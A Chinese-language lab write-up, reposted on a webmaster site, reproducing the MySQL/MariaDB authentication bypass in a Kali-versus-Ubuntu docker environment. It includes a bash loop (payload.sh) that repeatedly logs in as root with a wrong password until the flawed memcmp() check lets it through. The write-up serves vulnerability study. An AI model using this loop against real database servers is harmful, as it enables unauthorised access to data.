加入收藏 | 设为首页 | 会员中心 | 我要投稿 云计算网_宿迁站长网 (https://www.0527zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MySql教程 > 正文

漏洞复现—Mysql 身份认证绕过漏洞(kali攻击机,Ubuntu受害主机)

发布时间:2022-11-26 14:03:27 所属栏目:MySql教程 来源:网络
导读:
漏洞描述
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
也就是说只要知道用户

mysql数据库主机_mysql主机_主机屋mysql

漏洞描述

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。

也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库;按照公告说法大约256次就能够蒙对一次,而且漏洞利用工具已经出现。

受版本影响

主机准备

一台ubuntu(192.168.12.137),一台kail

均处于同一内网环境下。

其中kail作为攻击主机,ubuntu作为受害主机。

环境搭建

docker-compose up -d

mysql主机_主机屋mysql_mysql数据库主机

环境启动成功

环境启动后,将启动一个Mysql服务,监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

mysql数据库主机_主机屋mysql_mysql主机

先使用正确的密码登录看看是否成功启动环境

在kail主机的命令行输入命令

mysql -h 192.168.12.137 -u root -p123456 -P3306

mysql主机_主机屋mysql_mysql数据库主机

写如下shell脚本mysql主机,并执行

payload.sh

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.12.137 -P3306 ; done

命令行执行

bash payload.sh

mysql数据库主机_mysql主机_主机屋mysql

成功登录;利用成功

切记勿做违法行为

(编辑:云计算网_宿迁站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!